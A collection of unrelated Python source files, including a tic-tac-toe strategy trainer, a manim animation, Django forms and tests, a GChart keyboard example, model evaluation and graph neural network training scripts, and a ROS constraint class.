the optimal strategy as opposed to choosing a random available move.
"""
self.ability_level = level
def win(self, board, key='X'):
""" If we have two in a row and the 3rd is available, take it. """
# Check for diagonal wins
a = [board[0][0], board[1][1], board[2][2]]
b = [board[0][2], board[1][1], board[2][0]]
if a.count('-') == 1 and a.count(key) == 2:
ind = a.index('-')
return ind, ind
elif b.count('-') == 1 and b.count(key) == 2:
ind = b.index('-')
if ind == 0:
return 0, 2
elif ind == 1:
return 1, 1
else:
return 2, 0
# Now check for 2 in a row/column + empty 3rd
for i in range(3):
c = [board[0][i], board[1][i], board[2][i]]
d = [board[i][0], board[i][1], board[i][2]]
if c.count('-') == 1 and c.count(key) == 2:
ind = c.index('-')
return ind, i
elif d.count('-') == 1 and d.count(key) == 2:
ind = d.index('-')
return i, ind
return None
def blockWin(self, board):
""" Block the opponent if she has a win available. """
return self.win(board, key='O')
def fork(self, board):
""" Create a fork opportunity such that we have 2 threats to win. """
# Check all adjacent side middles
if board[1][0] == 'X' and board[0][1] == 'X':
if board[0][0] == '-' and board[2][0] == '-' and board[0][2] == '-':
return 0, 0
elif board[1][1] == '-' and board[2][1] == '-' and board[1][2] == '-':
return 1, 1
elif board[1][0] == 'X' and board[2][1] == 'X':
if board[2][0] == '-' and board[0][0] == '-' and board[2][2] == '-':
return 2, 0
elif board[1][1] == '-' and board[0][1] == '-' and board[1][2] == '-':
return 1, 1
elif board[2][1] == 'X' and board[1][2] == 'X':
if board[2][2] == '-' and board[2][0] == '-' and board[0][2] == '-':
return 2, 2
elif board[1][1] == '-' and board[1][0] == '-' and board[0][1] == '-':
return 1, 1
elif board[1][2] == 'X' and board[0][1] == 'X':
if board[0][2] == '-' and board[0][0] == '-' and board[2][2] == '-':
return 0, 2
elif board[1][1] == '-' and board[1][0] == '-' and board[2][1] == '-':
return 1, 1
# Check all cross corners
elif board[0][0] == 'X' and board[2][2] == 'X':
if board[1][0] == '-' and board[2][1] == '-' and board[2][0] == '-':
return 2, 0
elif board[0][1] == '-' and board[1][2] == '-' and board[0][2] == '-':
return 0, 2
elif board[2][0] == 'X' and board[0][2] == 'X':
if board[2][1] == '-' and board[1][2] == '-' and board[2][2] == '-':
return 2, 2
elif board[1][0] == '-' and board[0][1] == '-' and board[0][0] == '-':
return 0, 0
return None
def blockFork(self, board):
""" Block the opponents fork if she has one available. """
corners = [board[0][0], board[2][0], board[0][2], board[2][2]]
# Check all adjacent side middles
if board[1][0] == 'O' and board[0][1] == 'O':
if board[0][0] == '-' and board[2][0] == '-' and board[0][2] == '-':
return 0, 0
elif board[1][1] == '-' and board[2][1] == '-' and board[1][2] == '-':
return 1, 1
elif board[1][0] == 'O' and board[2][1] == 'O':
if board[2][0] == '-' and board[0][0] == '-' and board[2][2] == '-':
return 2, 0
elif board[1][1] == '-' and board[0][1] == '-' and board[1][2] == '-':
return 1, 1
elif board[2][1] == 'O' and board[1][2] == 'O':
if board[2][2] == '-' and board[2][0] == '-' and board[0][2] == '-':
return 2, 2
elif board[1][1] == '-' and board[1][0] == '-' and board[0][1] == '-':
return 1, 1
elif board[1][2] == 'O' and board[0][1] == 'O':
if board[0][2] == '-' and board[0][0] == '-' and board[2][2] == '-':
return 0, 2
elif board[1][1] == '-' and board[1][0] == '-' and board[2][1] == '-':
return 1, 1
# Check all cross corners (first check for double fork opp using the corners array)
elif corners.count('-') == 1 and corners.count('O') == 2:
return 1, 2
elif board[0][0] == 'O' and board[2][2] == 'O':
if board[1][0] == '-' and board[2][1] == '-' and board[2][0] == '-':
return 2, 0
elif board[0][1] == '-' and board[1][2] == '-' and board[0][2] == '-':
return 0, 2
elif board[2][0] == 'O' and board[0][2] == 'O':
if board[2][1] == '-' and board[1][2] == '-' and board[2][2] == '-':
return 2, 2
elif board[1][0] == '-' and board[0][1] == '-' and board[0][0] == '-':
return 0, 0
return None
def center(self, board):
""" Pick the center if it is available. """
if board[1][1] == '-':
return 1, 1
return None
def corner(self, board):
""" Pick a corner move. """
# Pick opposite corner of opponent if available
if board[0][0] == 'O' and board[2][2] == '-':
return 2, 2
elif board[2][0] == 'O' and board[0][2] == '-':
return 0, 2
elif board[0][2] == 'O' and board[2][0] == '-':
return 2, 0
elif board[2][2] == 'O' and board[0][0] == '-':
return 0, 0
# Pick any corner if no opposites are available
elif board[0][0] == '-':
return 0, 0
elif board[2][0] == '-':
return 2, 0
elif board[0][2] == '-':
return 0, 2
elif board[2][2] == '-':
return 2, 2
return None
def sideEmpty(self, board):
""" Pick an empty side. """
if board[1][0] == '-':
return 1, 0
elif board[2][1] == '-':
return 2, 1
elif board[1][2] == '-':
return 1, 2
elif board[0][1] == '-':
return 0, 1
return None
def randomMove(self, board):
""" Chose a random move from the available options. """
possibles = []
for i in range(3):
for j in range(3):
if board[i][j] == '-':
possibles += [(i, j)]
return possibles[random.randint(0, len(possibles)-1)]
def makeMove(self, board):
"""
Trainer goes through a hierarchy of moves, making the best move that
is currently available each time. A touple is returned that represents
(row, col).
"""
# Chose randomly with some probability so that the teacher does not always win
if random.random() > self.ability_level:
return self.randomMove(board)
# Follow optimal strategy
a = self.win(board)
if a is not None:
return a
a = self.blockWin(board)
if a is not None:
return a
a = self.fork(board)
if a is not None:
return a
a = self.blockFork(board)
if a is not None:
return a
a = self.center(board)
if a is not None:
return a
a = self.corner(board)
if a is not None:
return a
a = self.sideEmpty(board)
if a is not None:
return a
return self.randomMove(board)
|
1696208
|
from pathlib import Path
from numpy import array
from manim import *
class VectorAddition(Scene):
def construct(self):
VECT1 = np.array([3, 2, 0])
VECT2 = np.array([2, -1, 0])
VECT1_COLOR = "#b9b28b"
VECT2_COLOR = "#b98b99"
VECT3_COLOR = "#8ba7b9"
vect1 = Line(start=ORIGIN, end=VECT1, stroke_color=VECT1_COLOR).add_tip()
vect1_name = MathTex("\\vec{a}").next_to(vect1.get_center(), UP + LEFT * 2, buff=0.1).set_color(VECT1_COLOR)
vect2 = Line(start=VECT1, end=VECT1 + VECT2, stroke_color=VECT2_COLOR).add_tip()
vect2_name = MathTex("\\vec{b}").next_to(vect2.get_center(), UP * 2 + RIGHT, buff=0.1).set_color(VECT2_COLOR)
vect3 = Line(start=ORIGIN, end=VECT1 + VECT2, stroke_color=VECT3_COLOR, stroke_width=8).add_tip()
vect3_name = MathTex("\\vec{a} + \\vec{b}").next_to(vect3.get_center(), DOWN * 1.5, buff=0.1).set_color(VECT3_COLOR)
self.camera.frame_center = np.array([2.5, 1, 0])
self.play(GrowFromPoint(vect1, point=vect1.get_start()), Write(vect1_name), run_time=2)
self.wait()
self.play(GrowFromPoint(vect2, point=vect2.get_start()), Write(vect2_name), run_time=2)
self.wait()
self.play(LaggedStart(GrowFromPoint(vect3, point=vect3.get_start())), Write(vect3_name), run_time=3, lag_ratio=1)
self.wait(4)
if __name__ == '__main__':
# Generate animated gif.
config.background_color = WHITE
config.pixel_height = 300
config.pixel_width = 600
config.frame_width = 6
config.frame_height = 5
config.output_file = Path(__file__).resolve().parent.parent.parent / Path('notes/_media/vector-add-example')
config.format = 'gif'
scene = VectorAddition()
scene.render()
# Generate cover png.
config.save_last_frame = True
config.output_file = Path(__file__).resolve().parent.parent.parent / Path('notes/_media/vector-add-cover')
scene = VectorAddition()
scene.render()
|
1696264
|
import argparse
import format_helper
import madlibber
import path_helper
import word_helper
def parse_args():
"""Returns parsed arguments."""
parser = argparse.ArgumentParser()
parser.add_argument(
'-input_words',
type=str,
required=True,
help='The input words to substitute into templates.')
parser.add_argument(
'-input_sentence_templates',
type=str,
required=True,
help='The input sentence templates.')
parser.add_argument(
'-output_file',
type=str,
required=True,
help='The output file of filled in templates.')
return parser.parse_args()
def main():
args = parse_args()
ph = path_helper.PathHelper(args.input_words, args.input_sentence_templates,
args.output_file)
wh = word_helper.WordHelper(format_helper.FormatHelper)
m = madlibber.Madlibber(ph, format_helper.FormatHelper, wh)
m.load_sanity_check_templates_and_infer_word_categories()
m.load_and_sanity_check_words()
m.display_statistics()
should_fill = input('Do you wish to generate the sentences? [y/N]')
if should_fill == 'y':
m.fill_templates()
print('Done. Exiting...')
if __name__ == '__main__':
main()
|
1696275
|
from django import forms
from ftp.models import Account
from web.models import VHost
class AccountCreateForm(forms.ModelForm):
password = forms.CharField(widget=forms.widgets.PasswordInput)
vhost = forms.ModelChoiceField(queryset=VHost.objects.all(), empty_label="/", required=False)
class Meta:
model = Account
fields = ('name', 'password', 'vhost', 'path')
class AccountUpdateForm(forms.ModelForm):
new_password = forms.CharField(required=False, widget=forms.widgets.PasswordInput)
vhost = forms.ModelChoiceField(queryset=VHost.objects.all(), empty_label="/", required=False)
class Meta:
model = Account
fields = ('vhost', 'path')
|
1696288
|
import math
from pyjamas.chart import GChartUtil
from pyjamas.chart.GChart import GChart
from pyjamas.chart import AnnotationLocation
from pyjamas.chart import SymbolType
from pyjamas.ui.Button import Button
from pyjamas.ui.FocusPanel import FocusPanel
from pyjamas.ui.Grid import Grid
from pyjamas.ui import KeyboardListener
from pyjamas import DOM
"""*
* Example of how to add direct keyboard support to a GChart
* by wrapping it within a FocusPanel.
* <p>
*
* The example allows lets the user press the left and right arrow keys
* to move the selected point to the previous or next point after the
* currently selected point.
*
* For the more common case where you are handling mouse click
* events only, as of v2.61, GChart implements both GWT's
* HasMouse*Handlers and HasClickHandlers interfaces (c.f.
* GChartExample24.java) so this wrapper technique is usually not
* needed.
*
"""
N_POINTS = 100
BLUE = "#318ce0"
SKY_BLUE = "#c6defa"
class ChildGChart(GChart):
def __init__(self):
GChart.__init__(self)
self.setChartTitle(
"Click on chart, then use left/right arrows to switch selected point")
self.setHoverTouchingEnabled(True)
self.setChartSize(500, 150)
self.setPadding("10px")
self.getXAxis().setTickCount(11)
self.getYAxis().setTickCount(11)
self.addCurve()
for i in range(N_POINTS+1):
self.getCurve().addPoint(i, math.sin((2* math.pi * i)/N_POINTS))
self.getCurve().getSymbol().setWidth(5)
self.getCurve().getSymbol().setBorderColor(BLUE)
self.getCurve().getSymbol().setBackgroundColor(SKY_BLUE)
self.getCurve().getSymbol().setHoverSelectionBackgroundColor(BLUE)
self.getCurve().getSymbol().setHoverSelectionBorderColor(SKY_BLUE)
self.getCurve().getSymbol().setSymbolType(
SymbolType.VBAR_BASELINE_CENTER)
self.getCurve().getSymbol().setHoverLocation(
AnnotationLocation.NORTH)
self.getCurve().getSymbol().setHoverYShift(5)
self.setPixelSize(self.getXChartSizeDecorated(),
self.getYChartSizeDecorated())
class GChartExample25 (FocusPanel):
def __init__(self):
FocusPanel.__init__(self)
self.theChild = ChildGChart()
self.theChild.update()
self.setWidget(self.theChild)
self.addKeyboardListener(self)
self.addMouseListener(self)
def onKeyDown(self, sender, keycode, modifiers):
event = DOM.eventGetCurrentEvent()
DOM.eventPreventDefault(event)
# ignore mouse position when arrow-key pressing
if self.theChild.getHoverTouchingEnabled():
self.theChild.setHoverTouchingEnabled(False)
p = self.theChild.getTouchedPoint()
c = self.theChild.getCurve(); # only one curve on chart
iPoint = 0
if p is not None:
iPoint = c.getPointIndex(p)
if keycode == KeyboardListener.KEY_LEFT:
iPoint = (iPoint + N_POINTS) % (N_POINTS+1)
elif keycode == KeyboardListener.KEY_RIGHT:
iPoint = (iPoint + 1) % (N_POINTS+1)
self.theChild.touch(c.getPoint(iPoint))
self.theChild.update()
def onMouseMove(self, sender, x, y):
event = DOM.eventGetCurrentEvent()
DOM.eventPreventDefault(event)
# mousing auto re-enables mouse-over hover feedback
if not self.theChild.getHoverTouchingEnabled():
self.theChild.setHoverTouchingEnabled(True)
self.theChild.update()
def setOptimizeForMemory(self, optimize):
self.theChild.setOptimizeForMemory( optimize)
def update(self):
self.theChild.update()
|
1696293
|
from typing import Dict, Union
import os
import torch
import tqdm
import onnx
from torch.utils.data import DataLoader
from torchvision.datasets import ImageFolder, ImageNet
from furiosa_sdk_quantizer.evaluator.model_caller import ModelCaller
from furiosa_sdk_quantizer.evaluator.data_loader import random_subset
from furiosa_sdk_quantizer.evaluator.model_executor import ModelExecutor
from furiosa_sdk_quantizer.evaluator.evaluation_metric import ClassificationAccuracy
os.environ["KMP_DUPLICATE_LIB_OK"] = "Tru"
def run_eval(
model_class,
model_type,
val_dir,
cal_dir=None,
num_eval=100,
batch_size=1,
quantize=False,
is_print=False,
) -> None:
caller = ModelCaller(model_class, model_type)
model, transform = caller.call()
if model_type == "onnx":
from furiosa_sdk_quantizer.frontend.onnx import optimize_model
model = optimize_model(model)
if model_type == "onnx" and quantize:
from furiosa_sdk_quantizer.frontend.onnx import (
build_calibration_model,
ONNXCalibrator,
quantize,
)
calibration_model = build_calibration_model(model)
calibration_dataset = ImageFolder(cal_dir, transform=model_class.model_config["transform"])
dynamic_ranges = ONNXCalibrator(
calibration_model,
).calibrate_with_data_loader(DataLoader(calibration_dataset))
# set mode=1 <==> simulated quantization
model = quantize(
model, per_channel=True, static=True, mode=1, dynamic_ranges=dynamic_ranges
)
num_params = caller.param_count
num_macs = caller.mac_count
if is_print:
print(
f"model {caller.model_name} called.\n"
f"\tparam count: {num_params:,}\n"
f"\tmac_count: {num_macs:,}\n"
)
dataset = ImageNet(val_dir, split="val", transform=transform)
# `seed` is fixed to 1 because we need to get the same subset of
# `dataset` across multiple executions.
dataset = random_subset(dataset, num_eval, seed=1)
# The `shuffle` argument of DataLoader.__init__ does not have to be
# set to True because we are evaluating, not training, the model.
loader = DataLoader(dataset, batch_size)
if is_print:
print(f"backend: {model_type}")
print(f"feed {num_eval} samples with batch_size {batch_size}.\n")
accuracy = evaluate(model, loader, is_print)
return {"n_params": num_params, "n_macs": num_macs, **accuracy}
def evaluate(
model: Union[onnx.ModelProto, torch.nn.Module], loader: DataLoader, is_print: bool = False
) -> Dict[str, float]:
executor = ModelExecutor(model)
metric = ClassificationAccuracy()
for input, target in tqdm.tqdm(loader):
pred = executor.feed(input)
metric.measure(pred, target)
if is_print:
print("eval results:")
metric.print_result()
print("end of eval.")
accuracy = metric.announce()
return {
"top1_acc": accuracy["top1"],
"top5_acc": accuracy["top5"],
}
|
1696303
|
import unittest
import sys
from PyQt5.QtWidgets import QApplication, QDialog
from ui import FetchProgressDialog
app = QApplication(sys.argv)
fetch_progress_dialog = QDialog()
fetch_progress_dialog_ui = FetchProgressDialog.Ui_FetchProgressDialog()
fetch_progress_dialog_ui.setupUi(fetch_progress_dialog)
class FetchProgressDialogTests(unittest.TestCase):
def test_defaults(self):
'''Test the defaults'''
self.assertEqual(fetch_progress_dialog_ui.status_label.text(), "Fetching...")
self.assertEqual(fetch_progress_dialog_ui.progress_bar.text(), "24%")
def test_button(self):
okWidget = fetch_progress_dialog_ui.buttonBox.Ok
self.assertIsNotNone(okWidget)
retryWidget = fetch_progress_dialog_ui.buttonBox.Retry
self.assertIsNotNone(retryWidget)
cancelWidget = fetch_progress_dialog_ui.buttonBox.Cancel
self.assertIsNotNone(cancelWidget)
if __name__ == '__main__':
unittest.main()
|
1696306
|
import os
import time
import numpy as np
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import ray
from ray.util.sgd import TorchTrainer
from ray.util.sgd.utils import AverageMeterCollection
from ray.util.sgd.torch import TrainingOperator
import dgl
from dgl.data import RedditDataset
from dgl.nn.pytorch import GATConv
from torch.utils.data import DataLoader
from dgl.dataloading import NodeCollator
print("Current Path: " + os.getcwd())
torch.manual_seed(42)
# define the model class
class GAT(nn.Module):
def __init__(self, in_feats, n_hidden, n_classes, n_layers, n_heads,
activation, feat_drop, attn_drop, negative_slope, residual):
super().__init__()
self.n_layers = n_layers
self.activation = activation
self.n_hidden = n_hidden
self.n_heads = n_heads
self.n_classes = n_classes
self.convs = nn.ModuleList()
# input layer
self.convs.append(
GATConv((in_feats, in_feats), n_hidden, n_heads, feat_drop,
attn_drop, negative_slope, residual, self.activation))
# hidden layer
for _ in range(1, n_layers - 1):
# due to multi-head, the in_dim = num_hidden * num_heads
self.convs.append(
GATConv((n_hidden * n_heads, n_hidden * n_heads), n_hidden,
n_heads, feat_drop, attn_drop, negative_slope,
residual, self.activation))
# output layer
self.convs.append(
GATConv((n_hidden * n_heads, n_hidden * n_heads), n_classes,
n_heads, feat_drop, attn_drop, negative_slope, residual,
None))
def forward(self, blocks, x):
h = x
for i, (layer, block) in enumerate(zip(self.convs, blocks)):
h_dst = h[:block.number_of_dst_nodes()]
if i != len(self.convs) - 1:
h = layer(block, (h, h_dst)).flatten(1)
h = F.dropout(h, p=0.5, training=self.training)
else:
h = layer(block, (h, h_dst))
h = h.mean(1)
return h.log_softmax(dim=-1)
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (torch.argmax(pred, dim=1) == labels).float().sum() / len(pred)
class CustomTrainingOperator(TrainingOperator):
def setup(self, config):
# load reddit data
data = RedditDataset()
g = data[0]
g.ndata["features"] = g.ndata["feat"]
g.ndata["labels"] = g.ndata["label"]
self.in_feats = g.ndata["features"].shape[1]
self.n_classes = data.num_classes
# add self loop,
g = dgl.remove_self_loop(g)
g = dgl.add_self_loop(g)
# Create csr/coo/csc formats before launching training processes
g.create_formats_()
self.g = g
train_nid = torch.nonzero(g.ndata["train_mask"], as_tuple=True)[0]
val_nid = torch.nonzero(g.ndata["val_mask"], as_tuple=True)[0]
test_nid = torch.nonzero(g.ndata["test_mask"], as_tuple=True)[0]
self.train_nid = train_nid
self.val_nid = val_nid
self.test_nid = test_nid
# Create sampler
sampler = dgl.dataloading.MultiLayerNeighborSampler(
[int(fanout) for fanout in config["fan_out"].split(",")])
# Create PyTorch DataLoader for constructing blocks
collator = NodeCollator(g, train_nid, sampler)
train_dataloader = DataLoader(
collator.dataset,
collate_fn=collator.collate,
batch_size=config["batch_size"],
shuffle=False,
drop_last=False,
num_workers=config["sampling_num_workers"])
# Define model and optimizer, residual is set to True
model = GAT(self.in_feats, config["n_hidden"], self.n_classes,
config["n_layers"], config["n_heads"], F.elu,
config["feat_drop"], config["attn_drop"],
config["negative_slope"], True)
self.convs = model.convs
# Define optimizer.
optimizer = torch.optim.Adam(model.parameters(), lr=config["lr"])
# Register model, optimizer, and loss.
self.model, self.optimizer = self.register(
models=model, optimizers=optimizer)
# Register data loaders.
self.register_data(train_loader=train_dataloader)
def train_epoch(self, iterator, info):
meter_collection = AverageMeterCollection()
iter_tput = []
model = self.model
# for batch_idx,batch in enumerate(iterator):
for step, (input_nodes, seeds, blocks) in enumerate(iterator):
tic_step = time.time()
# do some train
optimizer = self.optimizer
device = 0
if self.use_gpu:
blocks = [block.int().to(device) for block in blocks]
batch_inputs = blocks[0].srcdata["features"]
batch_labels = blocks[-1].dstdata["labels"]
batch_pred = model(blocks, batch_inputs)
loss = F.nll_loss(batch_pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
iter_tput.append(len(seeds) / (time.time() - tic_step))
if step % 20 == 0:
acc = compute_acc(batch_pred, batch_labels)
gpu_mem_alloc = torch.cuda.max_memory_allocated(
) / 1000000 if torch.cuda.is_available() else 0
print("Epoch {:05d} | Step {:05d} | Loss {:.4f} | "
"Train Acc {:.4f} | Speed (samples/sec) {:.4f} | GPU "
"{:.1f} MB".format(info["epoch_idx"] + 1, step,
loss.item(), acc.item(),
np.mean(iter_tput[3:]),
gpu_mem_alloc))
status = meter_collection.summary()
return status
def validate(self, validation_loader, info):
meter_collection = AverageMeterCollection()
model = self.model
n_layers = self.config["n_layers"]
n_hidden = self.config["n_hidden"]
n_heads = self.config["n_heads"]
batch_size = self.config["batch_size"]
num_workers = self.config["sampling_num_workers"]
g = self.g
train_nid = self.train_nid
val_nid = self.val_nid
test_nid = self.test_nid
device = 0
model.eval()
with torch.no_grad():
x = g.ndata["features"]
for i, layer in enumerate(self.convs):
if i < n_layers - 1:
y = torch.zeros(
g.number_of_nodes(), n_hidden * n_heads
if i != len(self.convs) - 1 else self.n_classes)
else:
y = torch.zeros(
g.number_of_nodes(), n_hidden
if i != len(self.convs) - 1 else self.n_classes)
sampler = dgl.dataloading.MultiLayerFullNeighborSampler(1)
collator = NodeCollator(g, torch.arange(g.number_of_nodes()),
sampler)
dataloader = DataLoader(
collator.dataset,
collate_fn=collator.collate,
batch_size=batch_size,
shuffle=False,
drop_last=False,
num_workers=num_workers)
for input_nodes, output_nodes, blocks in dataloader:
block = blocks[0]
# print("block:",block)
block = block.int().to(device)
h = x[input_nodes].to(device)
h_dst = x[output_nodes].to(device)
if i != len(self.convs) - 1:
h = layer(block, (h, h_dst)).flatten(1)
else:
h = layer(block, (h, h_dst)).mean(1)
h = h.log_softmax(dim=-1)
y[output_nodes] = h.cpu()
x = y
pred = y
labels = g.ndata["labels"]
_, val_acc, test_acc = compute_acc(pred[train_nid], labels[
train_nid]), compute_acc(pred[val_nid], labels[val_nid]), \
compute_acc(pred[test_nid], labels[test_nid])
metrics = {
"num_samples": pred.size(0),
"val_acc": val_acc.item(),
"test_acc": test_acc.item()
}
meter_collection.update(metrics, n=metrics.pop("num_samples", 1))
status = meter_collection.summary()
return status
def run(num_workers, use_gpu, num_epochs, lr, batch_size, n_hidden, n_layers,
n_heads, fan_out, feat_drop, attn_drop, negative_slope,
sampling_num_workers):
trainer = TorchTrainer(
training_operator_cls=CustomTrainingOperator,
num_workers=num_workers,
use_gpu=use_gpu,
backend="nccl",
config={
"lr": lr,
"batch_size": batch_size,
"n_hidden": n_hidden,
"n_layers": n_layers,
"n_heads": n_heads,
"fan_out": fan_out,
"feat_drop": feat_drop,
"attn_drop": attn_drop,
"negative_slope": negative_slope,
"sampling_num_workers": sampling_num_workers
})
for i in range(num_epochs):
trainer.train()
validation_results = trainer.validate()
trainer.shutdown()
print(validation_results)
print("success!")
# Use ray.init(address="auto") if running on a Ray cluster.
if __name__ == "__main__":
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument("--num-workers", type=int, default=2)
argparser.add_argument("--use-gpu", type=bool, default=True)
argparser.add_argument("--num-epochs", type=int, default=2)
argparser.add_argument("--lr", type=float, default=0.001)
argparser.add_argument("--batch-size", type=int, default=1024)
argparser.add_argument("--n-hidden", type=int, default=128)
argparser.add_argument("--n-layers", type=int, default=2)
argparser.add_argument("--n-heads", type=int, default=4)
argparser.add_argument("--fan-out", type=str, default="10,25")
argparser.add_argument("--feat-drop", type=float, default=0.)
argparser.add_argument("--attn-drop", type=float, default=0.)
argparser.add_argument("--negative-slope", type=float, default=0.2)
argparser.add_argument(
"--sampling-num-workers",
type=int,
default=0,
help="Number of sampling processes. Use 0 for no extra process.")
argparser.add_argument(
"--address",
required=False,
type=str,
help="The address to use for ray")
args = argparser.parse_args()
ray.init(address=args.address)
run(num_workers=args.num_workers,
use_gpu=args.use_gpu,
num_epochs=args.num_epochs,
lr=args.lr,
batch_size=args.batch_size,
n_hidden=args.n_hidden,
n_layers=args.n_layers,
n_heads=args.n_heads,
fan_out=args.fan_out,
feat_drop=args.feat_drop,
attn_drop=args.attn_drop,
negative_slope=args.negative_slope,
sampling_num_workers=args.sampling_num_workers)
|
1696473
|
from django.contrib import admin
from django.db import models
from django_summernote.widgets import SummernoteWidget, SummernoteInplaceWidget
from django_summernote.models import Attachment
from django_summernote.settings import summernote_config
__widget__ = SummernoteWidget if summernote_config['iframe'] \
else SummernoteInplaceWidget
class SummernoteInlineModelAdmin(admin.options.InlineModelAdmin):
formfield_overrides = {models.TextField: {'widget': __widget__}}
class SummernoteModelAdmin(admin.ModelAdmin):
formfield_overrides = {models.TextField: {'widget': __widget__}}
class AttachmentAdmin(admin.ModelAdmin):
list_display = ['name', 'file', 'uploaded']
search_fields = ['name']
ordering = ('-id',)
admin.site.register(Attachment, AttachmentAdmin)
|
1696487
|
from rated_statistic_storage import *
from constraint_item import *
class Constraint(object):
"""Contains the whole constraint with corresponding reactions.
"""
def __init__(
self, name, constraint_root, planned_reaction,
min_reaction_interval, reaction_timeout):
super(Constraint, self).__init__()
#: The name of the constraint. Useful for debugging.
#: :type: string
self.__name = name
#: The root of the constraint tree.
#: :type: ConstraintItem
self.__constraint_root = constraint_root
#: Time since when this constraint is true.
#: # Note if true_since is 0 it has not been true.
#: :type: rospy.Time
self.true_since = rospy.Time(0)
#: An list of reactions that should be executed if the constraint
#: has been true longer than min_reaction_interval milliseconds.
#: :type: list of Reactions
self.planned_reaction = planned_reaction
#: The minimum time needed that the constraint needs to be true to
#: execute the planned reactions.
#: :type: rospy.Duration
self.__min_reaction_interval = min_reaction_interval
#: The time this reaction has been executed for the last time.
#: 0 if it has never been executed.
#: :type: rospy.Time
self.__last_reaction = rospy.Time(0)
#: Minimum durotation needed before an reaction can happen again.
#: :type: rospy.Duration
self.__reaction_timeout = reaction_timeout
#: True if the current state of the constraint says that
#: an execution of the reactions is necessary.
self.evaluation_result = False
def evaluate_constraint(self, storage):
"""Evaluates this constraint and sets the attributes
according to the result of the evaluation.
:param storage: The storage where the incoming statistics are saved.
:type storage: RatedStatisticStorage
"""
evaluation = self.__constraint_root.evaluate_constraint(storage)
#If the constraint is false only true_since has to be reset.
if not evaluation:
self.true_since = rospy.Time(0)
self.evaluation_result = False
else:
if self.true_since == rospy.Time(0):
self.true_since = rospy.Time.now()
if (
(rospy.Time.now() - self.true_since
>= self.__min_reaction_interval)
and
(rospy.Time.now() - self.__last_reaction
>= self.__reaction_timeout)):
self.evaluation_result = True
return
def notify_of_execution(self):
""" Tells this constraint that its reactions have just been executed.
# Note: its important to notify this constraint so it knows how long
the last execution was ago and does not execute too often.
"""
self.evaluation_result = False
self.__last_reaction = rospy.Time.now()
def __str__(self):
return self.__name
|
1696523
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from post.models import Channel, Question
from post.forms import post_form
class TestPostViews(TestCase):
@classmethod
def setUpTestData(cls):
user = User.objects.create_user(username="username", password="password")
user.save()
Channel.objects.create(name="testing1")
Channel.objects.create(name="testing2")
# post urls
cls.purl_ques = reverse('submit', args=['question'])
cls.purl_disc = reverse('submit', args=['discussion'])
def test_ask(self):
url = reverse('ask')
expected_url = "/new/ask"
self.assertEqual(url, expected_url)
resp = self.client.get(url)
# Should redirect to home if not logged in
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp.url, "/")
# Create an authenticated session
self.client.login(username="username", password="password")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, "new.html")
# Context Variables
channels = str(Channel.objects.all())
self.assertEqual(resp.context["metatype"], "question")
self.assertEqual(str(resp.context["channels"]), channels)
self.assertIsInstance(resp.context["form"], post_form)
def test_discuss(self):
url = reverse('discuss')
expected_url = "/new/discuss"
self.assertEqual(url, expected_url)
resp = self.client.get(url)
# Should redirect to home if not logged in
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp.url, "/")
# Create an authenticated session
self.client.login(username="username", password="password")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, "new.html")
# Context Variables
channels = str(Channel.objects.all())
self.assertEqual(resp.context["metatype"], "discussion")
self.assertEqual(str(resp.context["channels"]), channels)
self.assertIsInstance(resp.context["form"], post_form)
def test_submit_get(self):
url = self.purl_ques
# Should redirect to home in both cases
# 1) not logged in
resp = self.client.get(url)
self.assertRedirects(resp, "/")
# 2) logged in
self.client.login(username="username", password="password")
resp = self.client.get(url)
self.assertRedirects(resp, "/")
def test_submit_post_without_login(self):
url = self.purl_ques
# Posts without auth must redirect to home
resp = self.client.post(url, {})
self.assertRedirects(resp, "/")
def test_submit_simple_posts(self):
url = self.purl_ques
title = "Testing question posting"
desc = "Description of our test question."
simpledata = {
"title": title,
"description": desc,
"channels": ""
}
self.client.login(username="username", password="password")
q = Question.objects.all()
self.assertEqual(len(q), 0)
# Follow = True makes the client grab the redirected url too.
resp = self.client.post(url, simpledata, follow=True)
self.assertEqual(resp.status_code, 200)
# Tests for the newly created question.
q = Question.objects.all()
self.assertEqual(len(q), 1)
self.assertEqual(q[0].title, title)
self.assertEqual(q[0].description, desc)
self.assertEqual(q[0].channels.count(), 0)
self.assertEqual(q[0].metatype, "question")
self.assertEqual(q[0].author, "username")
# Test for posting of a discussion
url = self.purl_disc
resp = self.client.post(url, simpledata, follow=True)
self.assertEqual(resp.status_code, 200)
q = Question.objects.all()
self.assertEqual(len(q), 2)
self.assertEqual(q[1].metatype, "discussion")
def test_submit_post_with_channels(self):
url = self.purl_ques
title = "Testing post posting"
desc = "Description of our test question with channels."
simpledata = {
"title": title,
"description": desc,
"channels": ["1"]
}
self.client.login(username="username", password="password")
# resp = self.client.post(url, simpledata, follow=True)
# self.assertEqual(resp.status_code, 200)
# q = Question.objects.first()
# c = Channel.objects.get(name="testing1")
# self.assertEqual(len(Question.objects.all()), 1)
# self.assertEqual(q.title, title)
# self.assertEqual(q.channels.count(), 1)
# self.assertEqual(q.channels.all()[0], c)
# Test for posting of a discussion
url = self.purl_disc
simpledata["channels"] = ["2"]
# resp = self.client.post(url, simpledata, follow=True)
# self.assertEqual(resp.status_code, 200)
# q = Question.objects.last()
# c = str(Channel.objects.all())
# self.assertEqual(q.metatype, "discussion")
# self.assertEqual(q.channels.count(), 1)
# self.assertEqual(str(q.channels.all()), c)
def test_submit_post_with_errors(self):
url = self.purl_ques
simpledata = {
"title": "",
"description": "",
"channels": ""
}
# We aren't doing any server side error processing in post model.
# This isn't a serious problem as we are doing frontside error checking.
# But if for some reason the javascript has been disabled or someone tries to make an empty post,
# The server will throw a 500
|
1696630
|
from ...scheme import Scheme
from ..schemeinfo import SchemeInfoDialog
from ...gui import test
class TestSchemeInfo(test.QAppTestCase):
def test_scheme_info(self):
scheme = Scheme(title="A Scheme", description="A String\n")
dialog = SchemeInfoDialog()
dialog.setScheme(scheme)
status = dialog.exec_()
if status == dialog.Accepted:
self.assertEqual(
scheme.title.strip(), str(dialog.editor.name_edit.text()).strip()
)
